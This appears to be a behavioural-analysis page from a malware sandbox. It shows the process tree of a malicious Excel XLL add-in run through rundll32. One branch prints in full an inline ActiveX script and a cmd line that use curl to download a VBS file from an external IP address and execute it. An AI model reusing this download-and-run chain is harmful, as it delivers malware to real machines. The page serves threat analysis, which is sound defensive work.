| ZeroBOX

rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\41.xll.dll,hash
1648
- rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\41.xll.dll,hash
  2316
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\41.xll.dll,xor_decrypt
2164
- rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\41.xll.dll,xor_decrypt
  2356
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\41.xll.dll,xlAutoOpen
2072
- rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\41.xll.dll,xlAutoOpen
  2392
  - default.exe c:\users\public\default.exe about:"<script>var b = new ActiveXObject("wscript.shell"); b.run('cmd /c C:\\Windows\\system32\\curl.exe -o c:\\users\\public\\123321.vbs http://207.246.78.68/6kQh/AQbK2&&timeout 10&&c:\\users\\public\\123321.vbs', 0); window.close();</script>"
    2452
    - cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\curl.exe -o c:\users\public\123321.vbs http://207.246.78.68/6kQh/AQbK2&&timeout 10&&c:\users\public\123321.vbs
      2788
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\41.xll.dll,
2260

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis